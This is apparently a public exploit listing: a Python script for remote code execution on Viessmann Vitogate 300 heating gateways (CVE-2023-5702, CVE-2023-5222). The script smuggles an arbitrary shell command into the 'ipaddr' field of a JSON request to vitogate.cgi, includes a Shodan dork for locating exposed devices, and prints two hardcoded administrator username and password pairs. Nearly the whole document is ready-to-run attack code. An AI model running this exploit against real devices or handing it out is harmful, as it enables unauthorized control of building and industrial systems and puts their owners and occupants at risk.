Share
## https://sploitus.com/exploit?id=PACKETSTORM:177571
#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)  
#- Shodan Dork: http.title:'Vitogate 300'  
#- Exploit Author: ByteHunter  
#- Email: 0xByteHunter@proton.me  
#- Version: versions up to 2.1.3.0  
#- Tested on: 2.1.1.0  
#- CVE : CVE-2023-5702 & CVE-2023-5222  
  
  
import argparse  
import requests  
  
def banner():  
banner = """  
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—  
CVE-2023-5702   
Vitogate 300 RCE  
Author: ByteHunter   
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•  
"""  
  
print(banner)  
  
  
def send_post_request(target_ip, command, target_port):  
payload = {  
"method": "put",  
"form": "form-4-7",  
"session": "",  
"params": {  
"ipaddr": f"1;{command}"  
}  
}  
  
headers = {  
"Host": target_ip,  
"Content-Length": str(len(str(payload))),  
"Content-Type": "application/json"  
}  
  
url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"  
  
  
response = requests.post(url, json=payload, headers=headers)  
  
if response.status_code == 200:  
print("Result:")  
print(response.text)  
else:  
print(f"Request failed! status code: {response.status_code}")  
  
def main():  
parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")  
parser.add_argument("--target", required=False, help="Target IP address")  
parser.add_argument("--port", required=False, help="Target port",default="80")  
parser.add_argument("--command", required=False, help="Command")  
parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")  
  
args = parser.parse_args()  
  
if args.creds:  
print("Vitogate 300 hardcoded administrative accounts credentials")  
print("Username: vitomaster, Password: viessmann1917")  
print("Username: vitogate, Password: viessmann")  
else:  
target_ip = args.target  
target_port = args.port  
command = args.command  
  
if not (target_ip and command):  
print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")  
return  
  
send_post_request(target_ip, command,target_port)  
  
if __name__ == "__main__":  
banner()  
main()